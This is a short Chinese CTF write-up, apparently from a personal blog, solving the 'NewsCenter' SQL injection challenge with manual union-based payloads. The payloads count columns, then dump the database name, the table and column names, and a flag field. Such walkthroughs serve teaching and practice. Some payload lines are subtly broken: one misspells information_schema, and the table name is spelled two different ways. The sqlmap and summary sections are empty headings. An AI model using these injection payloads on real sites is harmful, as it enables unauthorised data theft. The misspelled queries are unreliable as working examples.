NewsCenter的wp

Posted by 1nhann on 2020-12-03
Page views

菜鸡刚学sqli,在这里写一道sql注入题的wp

题目NewsCenter

手注

先通过order by,判断后台select的字段数量

3的时候,没问题

但是4的时候,就报错了

说明后台select了3个字段

  • 回显当前database:

    1' union select 1,2,database()#

    返回news,说明这个数据库名为news

  • 回显news 数据库中所有表的名称:

    1'union select 1,2,group_concat(table_name) from information_scheme.tables where table_schema=database()#

  • 回显secrec_table中所有的字段名:

    1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='scret_table'

  • 查看fl4g字段的所有数据:

    1' union select 1,2,group_concat(fl4g) from scret_table

sqlmap 注

总结

  1. 常用的payload们:

  2. information_schema中常用的表与其常用字段: